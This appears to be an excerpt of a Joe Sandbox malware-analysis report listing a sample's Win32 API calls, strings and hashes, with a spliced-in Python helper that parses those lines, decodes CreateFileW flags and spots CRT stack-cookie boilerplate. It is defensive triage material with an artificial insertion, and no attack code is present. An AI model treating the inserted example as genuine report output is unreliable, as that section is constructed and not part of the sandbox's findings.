• Instruction Fuzzy Hash: F0A0113008800A8A8E802B32EA0800E3B20EB20BC830002A8A00ACA0A2CB22880F8A00
APIs
• SetCurrentDirectoryW.KERNELBASE(?,00E4AE72,C:\Users\user\Desktop,00000000,00E7946A,00000006), ref: 00E4AC08
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: CurrentDirectory
• String ID:
• API String ID: 1611563598-0
• Opcode ID: b4e5b18f0bf4e1cf2c44111f29cf1ccb133ff08fa67d92b973146426b5ca7f6d
• Instruction ID: 91efd589445cadc27d136003fc0a1abdfdd36b8b00708a2cfcbb96ea002de240
• Opcode Fuzzy Hash: b4e5b18f0bf4e1cf2c44111f29cf1ccb133ff08fa67d92b973146426b5ca7f6d
• Instruction Fuzzy Hash: 5BA011302022008BA2000B32AF0AA0FBAAAAFA2B80F00C028A00080030CB30C820AA00
APIs
• CloseHandle.KERNELBASE(000000FF,?,?,00E395D6,?,?,?,?,?,00E62641,000000FF), ref: 00E3963B
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: ee9ece119ed363e8f7be8b8545776717f18686ed6ebb3f5ea415c5f65f4b877a
• Instruction ID: 4597118a090e69eb7c10ed2ef44b933dc579c01dfd525a876bd858022820d598
• Opcode Fuzzy Hash: ee9ece119ed363e8f7be8b8545776717f18686ed6ebb3f5ea415c5f65f4b877a
• Instruction Fuzzy Hash: 72F08970482B159FDB308A74C85E792BBE86B12325F046B1ED0E6629E1D7A1698DCA40
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E31316: GetDlgItem.USER32(00000000,00003021), ref: 00E3135A
                                                                                                                      • Part of subcall function 00E31316: SetWindowTextW.USER32(00000000,00E635F4), ref: 00E31370
                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00E4C2B1
                                                                                                                    • EndDialog.USER32(?,00000006), ref: 00E4C2C4
                                                                                                                    • GetDlgItem.USER32(?,0000006C), ref: 00E4C2E0
                                                                                                                    • SetFocus.USER32(00000000), ref: 00E4C2E7
                                                                                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 00E4C321
                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00E4C358
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00E4C36E
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E4C38C
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E4C39C
                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00E4C3B8
                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00E4C3D4
                                                                                                                    • _swprintf.LIBCMT ref: 00E4C404
                                                                                                                      • Part of subcall function 00E34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E340A5
                                                                                                                    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00E4C417
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00E4C41E
                                                                                                                    • _swprintf.LIBCMT ref: 00E4C477
                                                                                                                    • SetDlgItemTextW.USER32(?,00000068,?), ref: 00E4C48A
                                                                                                                    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00E4C4A7
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00E4C4C7
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E4C4D7
                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00E4C4F1
                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00E4C509
                                                                                                                    • _swprintf.LIBCMT ref: 00E4C535
                                                                                                                    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00E4C548
                                                                                                                    • _swprintf.LIBCMT ref: 00E4C59C
                                                                                                                    • SetDlgItemTextW.USER32(?,00000069,?), ref: 00E4C5AF
                                                                                                                      • Part of subcall function 00E4AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00E4AF35
                                                                                                                      • Part of subcall function 00E4AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00E6E72C,?,?), ref: 00E4AF84
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                                    • String ID: %s %s$%s %s %s$P$REPLACEFILEDLG
                                                                                                                    • API String ID: 797121971-530609767
                                                                                                                    • Opcode ID: 41e28ce8142a1dbcff2857537b089ae541d0e6a54da1f23cda73fefbddca3246
                                                                                                                    • Instruction ID: 9fbc51d64d44bd04759d6e516da4bcd65795c668af9a8ecca03f9abab5812491
                                                                                                                    • Opcode Fuzzy Hash: 41e28ce8142a1dbcff2857537b089ae541d0e6a54da1f23cda73fefbddca3246
                                                                                                                    • Instruction Fuzzy Hash: 9C91D672249344BFD2619BB1EC49FFB77ECEB4A704F00581AF645E2091D7B5A6088762
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00E36FAA
                                                                                                                    • _wcslen.LIBCMT ref: 00E37013
                                                                                                                    • _wcslen.LIBCMT ref: 00E37084
                                                                                                                      • Part of subcall function 00E37A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00E37AAB
                                                                                                                      • Part of subcall function 00E37A9C: GetLastError.KERNEL32 ref: 00E37AF1
                                                                                                                      • Part of subcall function 00E37A9C: CloseHandle.KERNEL32(?), ref: 00E37B00
                                                                                                                      • Part of subcall function 00E3A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00E3977F,?,?,00E395CF,?,?,?,?,?,00E62641,000000FF), ref: 00E3A1F1
                                                                                                                      • Part of subcall function 00E3A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00E3977F,?,?,00E395CF,?,?,?,?,?,00E62641), ref: 00E3A21F
                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00E37139
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E37155
                                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00E37298
                                                                                                                      • Part of subcall function 00E39DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00E373BC,?,?,?,00000000), ref: 00E39DBC
                                                                                                                      • Part of subcall function 00E39DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00E39E70
                                                                                                                      • Part of subcall function 00E39620: CloseHandle.KERNELBASE(000000FF,?,?,00E395D6,?,?,?,?,?,00E62641,000000FF), ref: 00E3963B
                                                                                                                      • Part of subcall function 00E3A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00E3A325,?,?,?,00E3A175,?,00000001,00000000,?,?), ref: 00E3A501
                                                                                                                      • Part of subcall function 00E3A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00E3A325,?,?,?,00E3A175,?,00000001,00000000,?,?), ref: 00E3A532
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                    • API String ID: 3983180755-3508440684
                                                                                                                    • Opcode ID: caa978974057dce43d0d573ff64df07678606116ca8f30882db85e116fec15b2
                                                                                                                    • Instruction ID: cfb409e1a0533541b2f54a2e08bbab2075d8ef437b415c87d90bb1d1966189bb
                                                                                                                    • Opcode Fuzzy Hash: caa978974057dce43d0d573ff64df07678606116ca8f30882db85e116fec15b2
                                                                                                                    • Instruction Fuzzy Hash: 66C1C6B1904644AADB35DB74DC4AFEFBBE8AF04304F006559F996F3182D770AA48CB61
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __floor_pentium4
                                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                    • API String ID: 4168288129-2761157908
                                                                                                                    • Opcode ID: d384c475f3501916e52a04144069bb900b2a8f5e16d35e874241e5dbfbea6dc0
                                                                                                                    • Instruction ID: e32b08df5ed3189bff3d2811f68c87f405314b4c3d95da085a07cc71525d7289
                                                                                                                    • Opcode Fuzzy Hash: d384c475f3501916e52a04144069bb900b2a8f5e16d35e874241e5dbfbea6dc0
                                                                                                                    • Instruction Fuzzy Hash: 95C23C71E086288FDB79CE289D407E9B7B5EB44306F1459EAD84DF7240E774AE898F40
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog_swprintf
                                                                                                                    • String ID: CMT$h%u$hc%u
                                                                                                                    • API String ID: 146138363-3282847064
                                                                                                                    • Opcode ID: 35fd160585f9431e8e1ff2dbda386d0e399d42736e5aadd45d69305edf159cb8
                                                                                                                    • Instruction ID: 4e4e5daa6f37defd6a8572c34b961a849641556c3458e8757bb09fc8be5330eb
                                                                                                                    • Opcode Fuzzy Hash: 35fd160585f9431e8e1ff2dbda386d0e399d42736e5aadd45d69305edf159cb8
                                                                                                                    • Instruction Fuzzy Hash: E932C471510384ABDB18DF74C899EE97FE5AF54304F04647DFD8AAB282DB709A49CB20
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00E32874
                                                                                                                    • _strlen.LIBCMT ref: 00E32E3F
                                                                                                                      • Part of subcall function 00E402BA: __EH_prolog.LIBCMT ref: 00E402BF
                                                                                                                      • Part of subcall function 00E41B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00E3BAE9,00000000,?,?,?,0001047E), ref: 00E41BA0
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E32F91
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                                                    • String ID: CMT
                                                                                                                    • API String ID: 1206968400-2756464174
                                                                                                                    • Opcode ID: 58fa221a428d59f8c4e21de0f9cb49d8dfa9fb1a70214783e48795cb5d990418
                                                                                                                    • Instruction ID: c3cdd52775c0561035f02d7755f4939d5385c4bedbd3e6f89b78904c0debca8a
                                                                                                                    • Opcode Fuzzy Hash: 58fa221a428d59f8c4e21de0f9cb49d8dfa9fb1a70214783e48795cb5d990418
                                                                                                                    • Instruction Fuzzy Hash: F56227716002448FDB19DF34C88ABEA7FE1EF54304F08547EED9AAB282DB759945CB60
                                                                                                                    APIs
                                                                                                                    • VirtualQuery.KERNEL32(80000000,,0000001C,00E4E7DD,00000000,?,?,?,?,?,?,?,00E4E5E8,00000004,00E91CEC,00E4E86D), ref: 00E4E6B4
                                                                                                                    • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00E4E5E8,00000004,00E91CEC,00E4E86D), ref: 00E4E6CF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoQuerySystemVirtual
                                                                                                                    • String ID: D$
                                                                                                                    • API String ID: 401686933-250975860
                                                                                                                    • Opcode ID: 63ae3190674f228b3e432fffb7b645d7c5c3ee99965cba2ca87a76afea86ccf9
                                                                                                                    • Instruction ID: 036452e2be131547423d53189696b47416414220cdc74da621960fefc3b99ac7
                                                                                                                    • Opcode Fuzzy Hash: 63ae3190674f228b3e432fffb7b645d7c5c3ee99965cba2ca87a76afea86ccf9
                                                                                                                    • Instruction Fuzzy Hash: 94012B326001096BDF14DE29EC09BEE7BAAFFC4338F0CC121ED19E7250D634D9058680
                                                                                                                    APIs
                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00E4F844
                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00E4F910
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00E4F930
                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00E4F93A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 254469556-0
                                                                                                                    • Opcode ID: 7efd79dc9b45fbfe333d7b8b1fa3f5ab45fb02f619a31432c55cf3303fdc4911
                                                                                                                    • Instruction ID: 9c735ed898675dbbbc00118d836bc85caa048359d1ffbf3fc2b71ad5547f1c24
                                                                                                                    • Opcode Fuzzy Hash: 7efd79dc9b45fbfe333d7b8b1fa3f5ab45fb02f619a31432c55cf3303fdc4911
                                                                                                                    • Instruction Fuzzy Hash: 11312975D052199FDF20DFA5E9897CDBBF8AF08704F1050AAE50CAB250EB759B888F44
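Added example, not part of the Joe Sandbox report and not code from the analysed sample: a small Python triage helper for the APIs blocks above. It parses the `<API>.<MODULE>(<hex args>), ref: <addr>` lines (including the indented "Part of subcall function" lines), decodes the two CreateFileW calls of the file-writing function above (GENERIC_WRITE / CREATE_NEW / FILE_ATTRIBUTE_NORMAL, then GENERIC_READ|GENERIC_WRITE / OPEN_EXISTING with FILE_FLAG_BACKUP_SEMANTICS|FILE_FLAG_OPEN_REPARSE_POINT, which next to the SeRestorePrivilege, SeCreateSymbolicLinkPrivilege and \??\ strings reads, as an interpretation, like reparse-point-aware file extraction rather than anything exotic), and flags the IsProcessorFeaturePresent(0x17) / IsDebuggerPresent / SetUnhandledExceptionFilter(0) / UnhandledExceptionFilter sequence of the entry directly above as the MSVC CRT /GS stack-cookie failure handler (__report_gsfailure / __raise_securityfailure), compiler boilerplate that should not be weighted as a deliberate anti-debug check; the same three-call tail appears in the entry that follows. The function names, the sample-block constants and the pasted sample blocks are this example's own; the Win32 constant values are the standard ones from winnt.h / fileapi.h.

```python
"""Triage helpers for the "APIs" blocks of a Joe Sandbox function dump (added example,
not Joe Sandbox code): parse call lines, decode CreateFileW, spot the CRT /GS handler."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# "<API>.<MODULE>(<hex args>), ref: <addr>"; subcall lines carry a "Part of subcall function" prefix.
API_LINE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+): )?"
    r"(?P<api>[\w$?@]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]        # hex words as printed; "?" = value the sandbox could not recover
    ref: int               # call-site address
    caller: Optional[str]  # set for "Part of subcall function" lines

def parse_api_block(text: str) -> List[ApiCall]:
    """Parse one APIs block; bullets and indentation are stripped, non-call lines ignored."""
    calls: List[ApiCall] = []
    for raw in text.splitlines():
        m = API_LINE.match(raw.strip().lstrip("•").strip())
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
            calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16), m["caller"]))
    return calls

# Standard Win32 constants (winnt.h / fileapi.h); only the bits relevant here are listed.
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
          0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FLAGS = {0x80000000: "FILE_FLAG_WRITE_THROUGH", 0x40000000: "FILE_FLAG_OVERLAPPED",
         0x04000000: "FILE_FLAG_DELETE_ON_CLOSE", 0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
         0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT", 0x00000080: "FILE_ATTRIBUTE_NORMAL",
         0x00000002: "FILE_ATTRIBUTE_HIDDEN", 0x00000001: "FILE_ATTRIBUTE_READONLY"}

def _bits(value: int, table: Dict[int, str]) -> List[str]:
    """Name each known bit; an unknown remainder is kept as hex so nothing is silently dropped."""
    names = [name for bit, name in sorted(table.items(), reverse=True) if value & bit]
    known = 0
    for bit in table:
        known |= bit
    if value & ~known:
        names.append(hex(value & ~known))
    return names

def _hex_arg(call: ApiCall, index: int) -> Optional[int]:
    if index >= len(call.args) or call.args[index] in ("?", ""):
        return None
    return int(call.args[index], 16)

def decode_create_file(call: ApiCall) -> Dict[str, object]:
    """CreateFileW(lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes, dwCreationDisposition,
    dwFlagsAndAttributes, hTemplateFile); values past the seventh argument are stack noise and ignored."""
    if call.api not in ("CreateFileW", "CreateFileA"):
        raise ValueError("not a CreateFile call: " + call.api)
    access, share, disp, flags = (_hex_arg(call, i) for i in (1, 2, 4, 5))
    return {"access": None if access is None else _bits(access, ACCESS),
            "share": None if share is None else _bits(share, SHARE),
            "disposition": None if disp is None else DISPOSITION.get(disp, hex(disp)),
            "flags": None if flags is None else _bits(flags, FLAGS)}

# Tail of the MSVC CRT's __report_gsfailure / __raise_securityfailure (/GS cookie failure):
# IsDebuggerPresent, SetUnhandledExceptionFilter(NULL) to drop any user filter, UnhandledExceptionFilter.
# The four-call variant first probes IsProcessorFeaturePresent(0x17 = PF_FASTFAIL_AVAILABLE) for __fastfail.
GS_FAILURE_TAIL = ("IsDebuggerPresent", "SetUnhandledExceptionFilter", "UnhandledExceptionFilter")

def is_crt_gs_failure_handler(calls: List[ApiCall]) -> bool:
    """True when the function's own (non-subcall) calls end in the CRT sequence with a NULL filter."""
    direct = [c for c in calls if c.caller is None]
    if tuple(c.api for c in direct[-3:]) != GS_FAILURE_TAIL:
        return False
    return _hex_arg(direct[-2], 0) == 0

def triage(block: str) -> Dict[str, object]:
    """Per-block summary: call counts, decoded CreateFile opens and the CRT-handler verdict."""
    calls = parse_api_block(block)
    return {"calls": len(calls),
            "subcalls": sum(1 for c in calls if c.caller is not None),
            "create_file": [decode_create_file(c) for c in calls if c.api.startswith("CreateFile")],
            "crt_gs_failure_handler": is_crt_gs_failure_handler(calls)}

# Constructed samples: API lines copied from the two report entries above (one subcall line kept).
FILE_WRITER_BLOCK = """
• __EH_prolog.LIBCMT ref: 00E36FAA
  • Part of subcall function 00E3A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00E3977F,?,?,00E395CF,?,?,?,?,?,00E62641,000000FF), ref: 00E3A1F1
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00E37139
• CloseHandle.KERNEL32(00000000), ref: 00E37155
• CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00E37298
"""
GS_HANDLER_BLOCK = """
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00E4F844
• IsDebuggerPresent.KERNEL32 ref: 00E4F910
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00E4F930
• UnhandledExceptionFilter.KERNEL32(?), ref: 00E4F93A
"""
```

Running `triage(FILE_WRITER_BLOCK)` yields two decoded opens (a fresh CREATE_NEW write handle, then a read/write reopen with backup semantics and reparse-point access) and no CRT-handler match; `triage(GS_HANDLER_BLOCK)` yields no file opens and a positive CRT-handler verdict. The decoder keeps unknown bits as hex instead of dropping them, so an unexpected flag in a future sample is visible rather than hidden.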
                                                                                                                    APIs
                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00E58FB5
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00E58FBF
                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00E58FCC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    APIs
                                                                                                                    • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00E4AF35
                                                                                                                    • GetNumberFormatW.KERNEL32(00000400,00000000,?,00E6E72C,?,?), ref: 00E4AF84
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(00E36DDF,00000000,00000400), ref: 00E36C74
                                                                                                                    • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00E36C95
                                                                                                                    APIs
                                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00E619EF,?,?,00000008,?,?,00E6168F,00000000), ref: 00E61C21
                                                                                                                    APIs
                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00E4F66A
                                                                                                                    APIs
                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 00E3B16B
                                                                                                                    APIs
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00E4F3A5), ref: 00E4F9DA
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
